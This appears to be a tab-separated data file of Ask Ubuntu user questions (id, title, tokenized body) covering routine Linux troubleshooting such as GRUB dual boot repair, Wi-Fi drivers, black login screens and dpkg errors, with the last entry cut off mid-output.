464174	enabling dual boot of windows after rewriting mbr with grub	some time ago i had two operating systems on my hard disk , windows vista and windows 8 and i could double boot them . windows vista was installed on the active partition ( c : \ drive ) . then i formatted the c drive ( vista partition ) and installed ubuntu 12.04 on it . now i have grub on my mbr but i ca n't log in to windows 8 . to fix this i tried running bootrec.exe /fixmbr from the windows recovery console and it just made things worse . i lost grub , and then i could not log in to any operating systems and had to re install ubuntu after that . i want to boot windows 8 also from it besides ubuntu . how can i do it ? i do n't want to risk losing any of my data or installations , so please help me out . complete information about the hard disk and installed oss can be found here : http : //paste.ubuntu.com/7445519/ . thank you very much . any help is appreciated . edit1 : i tried the boot-repair utility . it created two new entries in the grub menu . one of them is my windows vista recovery drive ( ignore it ) and the other one is windows 8 that i want to boot in to on /dev/sda5 . here 's the complete report from that tool : http : //paste.ubuntu.com/7445554/
464176	ubuntu 12.04 crashes on startup for newer versions of linux , possibly related to wifi	my computer gets to the screen with the ubuntu logo and the orange/white dots , and then the screen goes black , spits out a lot of error messages , and can not boot . ( if it 'd be helpful , i can take a photo of my screen in this state . ) i 've found i can successfully boot if my wireless card is turned off . as soon as i turn it on , my computer crashes with the same black screen of death . i can also successfully boot if i choose `` previous linux version '' and select a few versions back ( i think 3.0.6 ) . here are some relevant details about my setup : ubuntu 12.04 computer : lenovo x230 wireless : realtek rtl8188ce 802.11b/g/n wifi adapter processor : intel core i5-3210m cpu @ 2.50ghz ă 4 ram : 16 gb of ram thank you ! ! !
464177	upgrading to 14.04 directly from 13.04	i have ubuntu 13.04 and want to upgrade to ubuntu 14.04 . i have the ubuntu 14.04 dvd . how do i start the installation process from ubuntu 13.04 ? i have booted into ubuntu 13.04 and inserted the dvd but i am not finding any clue about how to start . if i start the installation procedure without booting into ubuntu 13.04 , then i do n't get the up gradation option ; instead , i get the option for fresh installation , but i want to upgrade and not a fresh install .
464178	ap-hotspot not creating in kubuntu 14.04	i installed ap-hotspot in kubuntu 13.10 and it was working but then i upgraded my os to 14.04 and then it stopped working . i tried everything i removed the ap-hotspot completely and then again started it but it is not working it gets stuck in `` starting wireless hotspot ... '' is there any other way of creating a hotspot in kubuntu .
464179	azure server hangs in live environment	i am a newbie on ubuntu and have deployed my app on azure server large instance.my app is a website ( ruby on rails ) and there is considerable amount of traffic coming to the website . now today i got a strange issue wherein my website crashed..as i was trying to connect through putty i was getting network timeout error in putty ( tried from different machine and about 10 times ) .. then i went to azure dashboard and restarted the server and then when i started the web-server the site went live again . my question is why did the server crash or hang in the first place..also in such scenarios checked the syslog and authlog but could not find any thing weird.. i am using cloudflaredns service..has it something to do with the server stopping . please help me out
464180	how can i use dial-up internet in ubuntu 12.04	i want to convert from windows to ubuntu . i use a dial-up internet connection . in windows , it is very easy to setup a dialup connection . but in ubuntu 12.04 ( run from livecd ) i found no option to setup a dialup internet connection . i read other tutorials but i could n't understand them clearly . it would be very helpful for me if anyone can give me a step to step tutorial . it is holding me back from installing ubuntu because i work online most of the time . i 'm also a noob so please use easy language : ) . thanks in advance .
464182	will updates harm my kubuntu install on mac ibook g4 ppc ?	i 'm really grateful to those who have made ubuntu/kubuntu/lubuntu possible for the ibook g4 ! i recently installed kubuntu to get a little extra productivity out of my old mac , and it 's working well . however , kubuntu is telling me that updates are available and i 'm afraid to install them . i tried it once after a fresh install of kubuntu from cd , and yaboot would hang after the updates were installed when i tried to use it to load linux . when i re-installed kubuntu from my cd , everything worked fine again . could the problem be that the updated linux kernel does n't work on ppc macs ? i 'm using kubuntu 12.04 . if i recall correctly , the same thing happened when i tried installing ubuntu at about this time last year , so i gave up and re-installed mac os-x tiger . many thanks !
464183	how do i record from ardour with audacity ?	ok i am having this problem with audacity . i tested a theory and this is what i have discovered . audacity will record from an outside source , but when i set up qjackctl and ardour it stops recording . my guess is it has something to do with qjackctl , but you need that for ardour . all i am trying to do is convert a file from wav to mp3 . thank you all again for your help .
464196	unable to lock ( /var/lib/dpkg/ ) is another process using it ?	first of all , i 'm new to ubuntu and linux in general , so please be gentle . i recently tried to dual boot windows 7 with the most recent ubuntu os ( 14.04 i believe ) and somehow managed to delete my entire windows partition . i decided i would bite the bullet , so to speak , and use ubuntu exclusively until i can recover my windows and dual boot again . i have really no other option seeing as final exams are coming up and whatnot . anyways , i finished my ubuntu installation and reboot my computer . after i hit enter to launch ubuntu at the initial screen , my display goes purple and stays that way . sometimes a black screen comes up that says something about grub . i decided to once again boot the live version from my usb and reinstall , choosing the option to replace my windows hard drive entirely . again upon rebooting , i could not advance into the operating system past that first screen . i 've done some googling and i decided that the boot-repair tool was my best bet . i went ahead and tried to install through terminal but again , no such luck . i used the lines , if that 's of any help . sudo add-apt-repository ppa : yannubuntu/boot-repair sudo apt-get update sudo apt-get install -y boot-repair & & boot-repair following the sudo-apt-get update command i received the following messages : e : could not get lock /var/lib/apt/lists/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/lib/apt/lists/ e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? again , i believe boot-repair is my key to recovery here , however i am confident that i could be way off track . any and all help would be greatly appreciated .
464197	overwrite vista with xp professional and then reinstall ubuntu	i have vista on a laptop . i have tried to install ubuntu 12.04 alongside from the official disk . this has partly worked in that i can now surf much faster with ubuntu which i like . unfortunately i can get no sound on things like youtube , and none of my windows programs will load up . i guess that this could be down to vista inhibiting ubuntu . also i can not get vista to start at all . please help me . i need to temporarily delete ubuntu . i can then overwrite my corrupt vista with xp professional and then reinstall ubuntu for the surfing experience and to use the open source utilities . answers in plain language for a ubuntu newbie .
464202	how do i take a screenshot from the terminal ?	i am using lubuntu 14.04 . how do i - using the command line - take a screenshot of a window or my desktop ?
464205	how could i remove launcher bar from my primary monitor ( only ) ?	i need to display launcher bar only on secondary monitor . is it possible ?
464207	cant create new partition after uninstalling ubuntu	i installed ubuntu before today . i tried to delete a partition of ubuntu from windows 7 . i deleted the swap partition first then , then i deleted the /home partition . after that the free space of both got combined . i tried to create new partition from it , but an error occurred : there is not enough space available on the disk to complete this operation hence i 'm unable to create a partition . how do i to fix that ? i even tried to create one from windows 7 disk too , but got same error .
464208	internet browsers are slow and flash not working well	both firefox and chromium are very slow and flash plug-in seems have graphical issues bug screenshot : http : //i61.tinypic.com/2ciljq.jpg plus , i have noticed some other graphical problem : http : //i62.tinypic.com/4q2p5.png http : //i58.tinypic.com/rkvpmc.png
464215	ubuntu 14.04 installation stuck before welcome screen	i tried installation of ubuntu 14.04 using pendrive , after selecting boot form usb the ubuntu starts to load with purle screen but the welcome screen does not appear , instead of that a grey/black screen and it stays as it is pls help.. my hardware conf dell studio 1555 intel core 2 duo p8600 4 gb ram image : ubuntu_desktop_amd64
464217	i get blackscreen after boot in ubuntu 14.04	so today i woke up and could n't log in into my user ( the screen flashed and went back to the login screen ) , following advise elsewhere i deleted .xauthority . now i just get a black screen , i can only use tty 's . i reinstalling unity but it also didnt work . edit : i installed gdm and it also doest load . it just shows the ubuntu loading screen forever .
464219	unstable mouse pointer using synaptics touchpad	i have a sony vaio sve1711w1e laptop with ubuntu 14.04 lts x64 . the mouse pointer when i 'm using the synaptics touchpad is really inaccurate , when tapping the touchpad the pointer jumps to another location , so the touchpad is practically useless . i installed the latest gsynaptics pointing driver and tried to fix the problem by changing the min/max speed and acceleration , but the problem still exists . thanks in advance !
464221	how do i disable system 's alt+grave on 14.04 ?	the solution here does not work . i 'm trying to use alt+grave on ccsm , but unity 's shortcut is taking precedence . how can i disable unity 's version of alt+grave ? thank you !
464222	how to manage phpmyadmin extension from phpmyadmin ?	i would like to know if we could manage phpmyadmin extension from the phpmyadmin page avoiding to always go to /etc/php5/apache2/php.ini ? is it an option that we can manage from the webpage presenting the data base ? thank you for your response . vico
464224	eclipse version on ubuntu 14.04 ( trusty tahr )	newbie-question : does anyone know why in the ubuntu software repository eclipse is on version 3.8.1 while the latest eclipse version for linux from eclipse.org is eclipe 4.3.2 ? which version should i choose for recreational java development with git ? ( i have read somewhere some time ago , that eclipse is having issues which it 's 4.xx releases on linux and is lacking developer ressources to fix them , and someone even recommended not making eclipse updates through the built-in update feature of eclipse ... ) has anyone more information about this ? update ( 2014-05-11 12:02 ) : over at stackoverflow.com there is already helpful question with some answers : http : //stackoverflow.com/questions/19792909/why-does-ubuntu-14-04-stick-with-old-eclipse-3-8-when-4-3-is-out
464225	how to solve unity tweak tool and ubuntu tweak collision ?	i have installed ubuntu tweak and unity tweak tool . first i used unity-tweak-tool -- reset-unity and then i set the panel bar to transparent in ubuntu tweak tool . now the problem is that the panel bar is only transparent when i suspend the pc and login again , otherwise it uses the ubuntu tweak setting . and from the transparent bar i can see some text behind it .
464226	how to get cpu usage in percentages	at the moment i am using a python script to log the output from cat /proc/loadavg to a file . i then use gnuplot to periodically graph the cpu load for my viewing pleasure . however , i really would like to have a graph that shows percentages of cpu usage ( % user and % sys , etc . ) instead . i can see that top can get to those numbers , since they are displayed at the third line of its output . however , i have not been able to figure out how or where top gets that information . google is no help either , it just points me to either /proc/loadavg or problems people are having with high cpu loads . any hints on how i would be able to log those numbers ( preferably as 5-minutes averages ) to a file would be greatly appreciated .
464228	can i install ubuntu on windows 7 without affecting the recovery facility of windows 7 ?	i have windows 7 homebasic and now i want o install ubuntu 14.04 over it , i want to keep both ( dual boot ) . windows 7 has recovery facility , will ubuntu installation affect the recovery of windows 7 or not ? how can i do it ?
464237	allow fullscreen - where is this list stored ?	i 'm running ubuntu 14.04 , mozilla firefox 29.0 for ubuntu canonical 1.0 . after installation i 've watched some youtube videos and clicked fullscreen , and the popup 'allow full screen ? ' appeared . by misclick i 've clicked 'do n't allow ' and 'never ask again ' . where is this information stored ? how can i reverse it ? it 's very annoying since i ca n't view embedded youtube videos in fullscreen until i repair it .
464238	how can i get and install the asa utility on ubuntu 14.04 ?	i am new to ubuntu . how can i get and install the `` asa '' utility ( for interpreting carriage-control characters in output from fortran programs ) ? it does not appear to be installed on ubuntu 14.04 and i ca n't find it using search in the software centre . thanks for any help .
464240	can not connect to internet but ethernet is connected	due to the retirement of windows xp , i decided to try kubuntu . i installed it on a lenovo t61 laptop alongside xp . the ethernet controller is intel corp 82566mm gigabit network connection . the install went smoothly . it 's connected with a `` wired ' ethernet on eth0 , which shows connected . the browser can not find any webpages , server not found . i tried to ping google.com , returned unknown host i accessed the `` driver management ' but its empty . i 've changed the dns servers to 8.8.8.8,8.8.4.4 , and automatic ( only addresses ) . under active connections , some kb have been both received and sent . i am entirely new to linux . please help , as i 'd really like to use linux on other computers as well .
464242	really slow update/upgrade and other problems - where to start to diagnose/solve ?	last october i rebuilt my desktop and installed the amd64 version of 13.10 . i have an msi h87m-e33 intel h87 motherboard , an intel core i3-4130 ( haswell ) processor 4gb ram crucial v4 64gb ssd most of the time it runs really fast ( for me ) but i have had multiple problems with it hanging ( and needing hard resetting ) and always when updating it 's really really slow . now i 'm upgrading to 14.04 and it 's only 10 % there after three hours ! in the meantime i 've downloaded ubuntu onto a memory stick and installed on another machine and done lots of searching for answers ... i 've done quite a lot of checking of my ssd and that seems to be working ok. any suggestions about what the problem might be , or how to go about diagnosing it . i 've been using ubuntu since breezy and never had a problem like this before .
464243	prevent screen from turning black on server	i have an ubuntu server installation with xbmc . after 5 minutes of inactivity the screen turns black and ca n't be woken up with the remote control . however a keyboard press does wake it up . since i do n't want to use a keyboard this is very annoying . the black screen does n't seem to be issued by xbmc itself . it 's own screensaver is set to dim after 3 minutes , which it does . xbmc is started using xinit . i 'd like to prevent the screen from turning black or find a way to wake it up using the remote . what i 've tried so far is : set grub_cmdline_linux_default= '' consoleblank=0 '' in /etc/default/grub and run update-grub . add blank_time=0 and powerdown_time=0 in /etc/kbd/config
464244	why connection with sakis3g not detected by network manager	i have a photon 3g modedm and i am using sakis3g to connect to internet . after connecting to net i can browse internet in firefox and also i am able to install updates and softwares using apt-get . but when i open software center install option is greyed out as in picture and i wont be able to install softwares till i disable network manger by running this code in terminal sudo stop network-manager i want to know how this work ? also if i want to run this script while i login instead of typing this in terminal every time , where i can put this code ?
464245	howto repair grub in trible boot with two encrypted lvm ?	i setup win7/debiantesting/ubuntu 12.04 as triple boot , debian and ubuntu each on encrypted volume ( with separate root and swap partitions ) . installation order : win7 -- > debian -- > ubuntu , grub was installed in sda , everything went fine , all 3 os showing up in grub ui and able to boot . after an update with 12.04 ( probably new kernel ) , debian disappeared in grub and so far i am only able to get win/debian or win/ubuntu showing up in grub , according to these instructions : http : //ubuntuforums.org/showthread.php ? t=1807951 http : //stephentanner.com/index.php/2011/05/restoring-grub-for-an-encrypted-lvm/ my partitions : sda1 ntfs ( 100mb ) sda2 ntfs ( 210gb ) win7 sda3 extended partition where both linux distros are installed into to lvms : sda5 boot ( 250mb ) for debian sda6 encrypted lvm ( with separate debian swap and root partitions ) sda7 boot ( 300mb ) for ubuntu sda8 encrypted lvm ( with separate ubuntu swap and root partitions ) with ubuntu 12.04 livecd i am able to decrypt and mount all partitions , however either debian or ubuntu boot partitions are recognized/useable to use chroot and to reinstall gru into /sda any help/links would be highly appreciated ! thx a lot , ms
464246	shutdown problems and wi fi not working on acer extensa 5220	just installed ubuntu 14.04lts on an acer extensa 5220 laptop after install i downlaoded all the updates suggested . two problems : the in built wi fi does not work at all . i can connect to the network via a wired ethernet connection but the wireless network is not mentioned anywhere . second problem , on shutting down the screen goes blank , hdd activity stops but power remains on . have to then press and hold the power button to turn off . if i try going to suspend , the screen goes blank for a while , power stays on , then after a short while the screen comes back on inviting me to log in again . sudo lshw -c video returns : *-display:0 description : vga compatible controller product : mobile gm965/gl960 integrated graphics controller ( primary ) vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 03 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:44 memory : fc000000-fc0fffff memory : d0000000-dfffffff ioport:1800 ( size=8 ) *-display:1 unclaimed description : display controller product : mobile gm965/gl960 integrated graphics controller ( secondary ) vendor : intel corporation physical id : 2.1 bus info : pci @ 0000:00:02.1 version : 03 width : 64 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : latency=0 resources : memory : fc100000-fc1fffff in the mean time sudo shutdown -h now stops any hdd activity but leaves power on with a screen saying ubuntu and scrolling red / white dots under it . i have tried using the software centre so search for driver . it says `` no additional drivers found '' i did find in the software centre `` windows wireless drivers '' which claims to be an easy way to install windows wireless drivers . but beg my ignorance , having downloaded it , i can ; t find where it has put it to actually run it ?
464247	ubuntu 14.04 wo n't go beyond grub boot when loading from usb on windows 8	i downloaded 14.04 version of ubuntu and burned it on my flash memory . when i booted my flash drive i was able to see the ubuntu boot loader but when i selected ubuntu it wo n't go any further and a black screen appears . when i force restarted it and again tried to boot in to usb it shows no operating system found . i do n't know what to do . any help would be appreciated .
464252	e : sub-process /usr/bin/dpkg returned an error code ( 1 ) stopped an upgrade	so , i was doing an upgrade via the terminal . i think ( im not sure what i was doing . it was downloading updates for wine and libreoffice so i think it was an upgrade and i stopped it during the process ( i know , very stupid ) . so i tried restarting the process but the infamous e : sub-process /usr/bin/dpkg returned an error code ( 1 ) thing came up . heres the output of sudo dpkg -- configure -a its long so i 'll just show the last few lines errors were encountered while processing : wine1.7-amd64 wine1.7-i386 libreoffice-core python3-uno libreoffice-math libreoffice-impress libreoffice libreoffice-writer libreoffice-base-core libreoffice-gnome libreoffice-base libreoffice-sdbc-firebird libreoffice-report-builder-bin libreoffice-sdbc-hsqldb libreoffice-pdfimport libreoffice-avmedia-backend-gstreamer libreoffice-gtk libreoffice-base-drivers libreoffice-draw libreoffice-calc i cant do anything besides an apt-get update and i cant remove or purge these . help ? ?
464258	time format of kubuntu 14.04 is in khmer	i 've just install kubuntu 14.04 on my macbook pro mid 2010 . but the problem is even though i set the language in local ( system settings ) , the time format is still wrong . it also effects skype timeformat . i need help . thank you . some images from my computer .
464259	temporary mount 2nd windows data drive	i have a windows 7 system which has just had a motherboard failure . the system had 4 hard drives . 1 with os , the others with only data . i want to temporarily mount the data drives so that i can copy current working data to an alternate drive ? can anybody please help ? other wise i will have to buy a new windows machine to re-install the drives on th enew system just to copy the data off the drives ? ? i am running ubuntu 12.04 at the moment . thank you
464262	how to create vlc playlist from terminal and add files to it when it is playing ?	`` vlc file1 file2 file3 '' creates a playlist from terminal but all the files have to be specified beforehand . how can i create a playlist from terminal such that files can be anytime added to the playlist while it is playing .
464263	amd apu not saving preferences	i do n't know why after i poweroff my computer , cpu ( a4 4355m ) resets it 's preferences . i found that my apu has pstate 6 ( 900mhz ) and boost states disabled ( by default ? ) , so i use turionpowercontrol to enable them ( and undervolt a bit pstate 6 ) , but if a poweroff my computer everything resets . if i reboot , instead , everything stays as i set it . i also tried to set everything on boot but i do n't know how to refresh cpufreq ( whitout reboot ) so to use new frequencies in indicator-cpufreq . cpupower out : http : //oi62.tinypic.com/24v1glx.jpg turionpowercontrol out : http : //oi61.tinypic.com/23js6tj.jpg any ideas ? thank you all .
464264	starting openvpn client automatically at boot	i 'm trying to get openvpn to start automatically at boot . today i have to manually type in sudo openvpn -- client -- config $ home/openvpn/anonine.ovpn -- ca $ home/openvpn/anonine.ca.crt followed by username and password . is there a good way to make this automatic at boot ?
464267	web filtering , dhcp , proxies in a distro ?	i want to ditch our dave 's web filtering because it blocks anything our dear gov do not like , but i also want to protect my children from porn . i am thinking i can install a cut down ubuntu distro on my server ( running win7 pro 32bit ) using a vm or something . i have a virgin superhub so i will need to shut down the build in dhcp server as i have no way to configure that so i think what i need is a dhcp server and filtering software . does this sound correct , and is it easy to set up using ubuntu ? i must be able to update the filtering in case of false positives or negatives . thanks : )
464268	how do i get things downloaded ?	is it impossible to download , run and do scans with free malwarebytes anti-malware and free avast antivirus if you are using ubuntu ? if not what free protection and virus-destruction , malware-destruction and spyware-destruction can be installed , run and do scans with on ubuntu ? i am completely new to ubuntu since i can no longer use windows xp and because i have only just heard of ubuntu . i like ubuntu but am finding it extremely difficult to use being a technical dummy . i am asked to authenticate and do not know which of the many passwords that refers to . if it is to ubuntu i have forgotten due to problems with influenza and 8 hours trying to get windows xp to function and can not find a link to get the necessary authentication password emailed to me or change passwords . after i reinstalled windows xp using the cd i can no longer use any browser on windows xp to access the internet . otherwise the launcher manager on ubuntu prevents any installing i try to do without giving any reason other than error nor suggestion on what to do to get the installation performed . now also the launcher archive icon has vanished from the left hand side of my ubuntu screen and i can not find it anywhere . i would also like to be able to view youtube but the flash programme -which i believe is from ubuntu- also gets the error message when i try to install it so i can not open any video channels i subscribe to . other necessities for me are viber and skype and ancestry quest . if i can install and use with ubuntu the programs i want and need i would like to remove windows xp completely but do not know how and am scared that if i do so i shall lose everything . i saved the wrong file of my names and passwords to my usb memory so now i shall have problems accessing everything . thank you for helping . kind regards , edwin
464271	how do i restore dolphin instead of gwenview as default file manager	in the 2 years or so i have used kubuntu 12.04 , dolphin has been my default file manager and gwenview my default image viewer . gwenview can also double up as a file manager , which can be useful when organising images and videos , but it provides less details ( such as dates ) on the files . i have a number of icons on my desktop representing files or folders , and if i click on a folder it opened in dolphin . a few days ago , it suddenly started opening gwenview to see the folders - whether i inadvertently changed a setting , or this was done by a system update , i know not . i 've followed the advice in how-to-set-up-dolphin-as-default-file-manager , but it does n't help ; so i 've uninstalled gwenview . ideally , i 'd like gwenview back as an image viewer , but dolphin as default file manager . is this possible , please ?
464272	how do i install pdf mod ?	i am running ubuntu 14.04 and i ca n't find pdf mod which is my favourite pdf-editing software . i 've downloaded the tarball from its website , extracted its contents , and gone to the directory in terminal and run ./configure but it told i needed gnome-doc-utils . this too i downloaded the tarball for and extracted . then i tried to configure this by going to said directory and running ./configure but i got this message : error : your intltool is too old . you need intltool 0.35.0 or later . so yet again i downloaded the tarball for the latest stable version of intltool ( 0.50 ) , extracted its contents , went to its directory and ran ./configure and while this worked with no errors i do n't know what i 'm meant to do now .
464274	is someone trying to hack into my server ? what can i do ?	a few weeks ago i posted a question here about some ssh issues i was having with an ubuntu 12.04 box . fast forward to today and i am trying to allow someone else access to the machine , but they keep getting password errors . i checkout out var/logs/auth.log for more info , and found this : may 11 19:45:33 myserver sshd [ 9264 ] : did not receive identification string from 211.110.xxx.x may 11 19:45:38 myserver sshd [ 9267 ] : did not receive identification string from 211.110.xxx.x may 11 19:45:44 myserver sshd [ 9270 ] : did not receive identification string from 211.110.xxx.x may 11 19:45:49 myserver sshd [ 9274 ] : did not receive identification string from 211.110.xxx.x i have almost 10000 lines that all seem to say more or less the same thing ( there are also 4 auth.log.gz files , which i 'm assuming are more of the same ? ) . sometimes there is a random username attached to the request , input_userauth_request : invalid user bash [ preauth ] i do n't know much about servers , but it looks like someone is trying to gain access to mine . googled around for how to block an ip address in ubuntu and ended up with this : iptables -a input -s 211.110.xxx.x -j drop , but after running that command and checking the logs , i 'm still getting requests from this one ip every 5 seconds . how can i find out more about what 's going on and deal with these constant requests ?
464279	ubuntu login screen does n't show up after cleaning nvram on a mid-2009 macbook pro	i have a macbook pro mid 2009 , with three partitions : osx 10.8.5 , ubuntu 13.04 and windows 7 . efi and grub are here , first efi boots with offering the choice of the three systems then , if linux or windows is chosen , grub shows up . everything worked fine until i cleared nvram by pressing the cmd+p+r combination while booting on osx . now , linux boots correctly but just before showing me the login screen , linux shows me a blank screen with a corsor blinking at me , i can write things but execute nothing . how to fix it ? i can furnish more precision if you tell me what command line to execute .
464282	nvidia driver , black login screen	after i install nvidia driver and reboot , i have black screen instead of login screen . i ca n't login . rebooting does n't help . after i purge the driver , everything goes back to normal . i have kubuntu 14.04
464283	could not connect to server - filezilla over sftp	i have ubuntu 12.04 server installed and also filezilla in it . i can ssh and ping into my server but i can not ssh using filezilla could not connect to server i have seen this post but there is no menu item like file or edit in my filezilla
464286	wifi connected but no internet . wired works through same router	last night in ran ubuntu from a dvd without installing . wifi connection was working fine . today i installed ubuntu and i ca n't get an internet connection . i connect to my wifi , but i get no connection . wired connection works like a charm on the same router . i would appreciate any help , thanks . krestensb @ krestensb : ~ $ nm-tool networkmanager tool state : connected ( global ) device : wlan0 [ 217 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : 802.11 wifi driver : wl state : connected default : no hw address : 20:16 : d8:1f:44:00 capabilities : speed : 72 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) homebox-7fab : infra , 7c:03:4c : cb:7f : b1 , freq 2437 mhz , rate 54 mb/s , strength 39 wpa2 *217 : infra , 10 : fe : ed : ad:94:3a , freq 2427 mhz , rate 54 mb/s , strength 70 wpa2 nico : infra , 14 : da : e9 : f1:8e : d4 , freq 2462 mhz , rate 54 mb/s , strength 24 wpa wpa2 lyseroeddue : infra , 98 : fc:11:73:96:84 , freq 2437 mhz , rate 54 mb/s , strength 24 wpa wpa2 ipv4 settings : address : 192.168.0.107 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.0.1 dns : 192.168.0.1 device : eth0 [ wired connection 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : connected default : yes hw address : 3c:97:0e:4c : b9:48 capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : on ipv4 settings : address : 192.168.0.102 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.0.1 dns : 192.168.0.1
464290	black screen on login maybe lightdm problem	hi after i entered this command in terminal : sudo sh -c 'echo `` greeter-show-manual-login=true '' > > /etc/lightdm/lightdm.conf' and i reboot my pc i can not login to ubuntu . after i select the os in grub it takes me to a black screen and i ca n't do anything even though ubuntu seems to run ; everytime i turn off my computer via the power button the ubuntu logo appear . i think it has got to do with lightdm . i have tried to run in safe graphics mode but nothing happen what should i do ?
464291	how can i install both windows 7 and ubuntu 14.04 ?	i have an 80 gb hard drive and 8 gb of ram . do i need to make a partition to install ubuntu 14.04 and windows 7 alongside each other ? i have tried but i could not do it . please help me out .
464293	lenovo g510 webcam not detected	i have lenvo g510 . cheese and guvcview do n't detect my webcam . its my lsubs : bus 002 device 002 : id 8087:8000 intel corp . bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:8008 intel corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 002 : id 0bda:0129 realtek semiconductor corp. rts5129 card reader controller bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub how to fix it ?
464294	system suspend instead of shutting down	my system gets suspended when i turn off the power supply . it only happen when i use ubuntu os . how can i solve this problem ? i am using toshiba satellite series laptop .
464296	adding apt-get to sudoers file	i 've grown tired of always invoking apt-get update and apt-get upgrade under sudo and typing my password , so i have added the following line to my /etc/sudoers file using visudo : < myusername > all=nopasswd : /usr/bin/apt-get unfortunately when i invoke apt-get i am met with the following error : < myusername > @ sputnik : ~ $ apt-get update e : could not open lock file /var/lib/apt/lists/lock - open ( 13 : permission denied ) e : unable to lock directory /var/lib/apt/lists/ e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? i have tried to add the following ( fairly obvious ) line to /etc/sudoers too but to no effect < myusername > all=nopasswd : /usr/bin/dpkg what must i do ?
464297	how can i disable wireless on lubuntu ?	i need to put lubuntu into offline mode when i go downtown . how do i do this ? in ubuntu i can do it from the network manager applet , but i ca n't seem to do so in lubuntu .
464301	libmotif-common ( = 2.3.4-5 ) error	which ever software i am trying to install i am getting the below error ramesh @ ramesh-k56ca : ~/cpract $ sudo apt-get install tlp tlp-rdw reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : libxm4 : depends : libmotif-common ( = 2.3.4-5 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . now if i try with -f then also i am getting the same error ramesh @ ramesh-k56ca : ~/cpract $ sudo apt-get -f install tlp tlp-rdw reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : libxm4 : depends : libmotif-common ( = 2.3.4-5 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . could you please help to resolve this issue even after the running sudo apt-get install -f to fix all dependancies i am getting the same error ramesh @ ramesh-k56ca : ~/cpract $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : lib32z1 libatk1.0-0 : i386 libavahi-client3 : i386 libavahi-common-data : i386 libavahi-common3 : i386 libc6-i386 libcairo2 : i386 libcups2 : i386 libdatrie1 : i386 libexpat1 : i386 libffi6 : i386 libfontconfig1 : i386 libfreetype6 : i386 libgcrypt11 : i386 libgdk-pixbuf2.0-0 : i386 libglib2.0-0 : i386 libgnutls26 : i386 libgpg-error0 : i386 libgraphite2-3 : i386 libgssapi-krb5-2 : i386 libgtk2.0-0 : i386 libharfbuzz0b : i386 libice6 : i386 libjasper1 : i386 libjbig0 : i386 libjpeg-turbo8 : i386 libjpeg8 : i386 libk5crypto3 : i386 libkeyutils1 : i386 libkrb5-3 : i386 libkrb5support0 : i386 libp11-kit0 : i386 libpango-1.0-0 : i386 libpangocairo-1.0-0 : i386 libpangoft2-1.0-0 : i386 libpixman-1-0 : i386 libsm6 : i386 libtasn1-6 : i386 libthai0 : i386 libtiff5 : i386 libx11-6 : i386 libxau6 : i386 libxcb-render0 : i386 libxcb-shm0 : i386 libxcb1 : i386 libxcomposite1 : i386 libxcursor1 : i386 libxdamage1 : i386 libxdmcp6 : i386 libxext6 : i386 libxfixes3 : i386 libxi6 : i386 libxinerama1 : i386 libxp6 : i386 libxrandr2 : i386 libxrender1 : i386 libxt6 : i386 nspluginviewer : i386 nspluginwrapper use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libmotif-common the following new packages will be installed : libmotif-common 0 upgraded , 1 newly installed , 0 to remove and 95 not upgraded . 5 not fully installed or removed . need to get 0 b/11.8 kb of archives . after this operation , 116 kb of additional disk space will be used . do you want to continue ? [ y/n ] y ( reading database ... 168327 files and directories currently installed . ) preparing to unpack ... /libmotif-common_2.3.4-5_all.deb .. unpacking libmotif-common ( 2.3.4-5 ) ... dpkg : error processing archive /var/cache/apt/archives/libmotif-common_2.3.4-5_all.deb ( -- unpack ) : trying to overwrite '/usr/include/x11/bitmaps/xm_hour32 ' , which is also in package libmotif4 2.3.4- errors were encountered while processing : /var/cache/apt/archives/libmotif-common_2.3.4-5_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) ramesh @ ramesh-k56ca : ~/cpract $ ramesh @ ramesh-k56ca : ~/cpract $ sudo dpkg -p libmotif4 dpkg : dependency problems prevent removal of libmotif4 : libmotif4-dbg depends on libmotif4 ( = 2.3.4-1 ) . motif-clients depends on libmotif4 . dpkg : error processing package libmotif4 ( -- purge ) : dependency problems - not removing errors were encountered while processing : libmotif4 ramesh @ ramesh-k56ca : ~/cpract $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : lib32z1 libatk1.0-0 : i386 libavahi-client3 : i386 libavahi-common-data : i386 libavahi-common3 : i386 libc6-i386 libcairo2 : i386 libcups2 : i386 libdatrie1 : i386 libexpat1 : i386 libffi6 : i386 libfontconfig1 : i386 libfreetype6 : i386 libgcrypt11 : i386 libgdk-pixbuf2.0-0 : i386 libglib2.0-0 : i386 libgnutls26 : i386 libgpg-error0 : i386 libgraphite2-3 : i386 libgssapi-krb5-2 : i386 libgtk2.0-0 : i386 libharfbuzz0b : i386 libice6 : i386 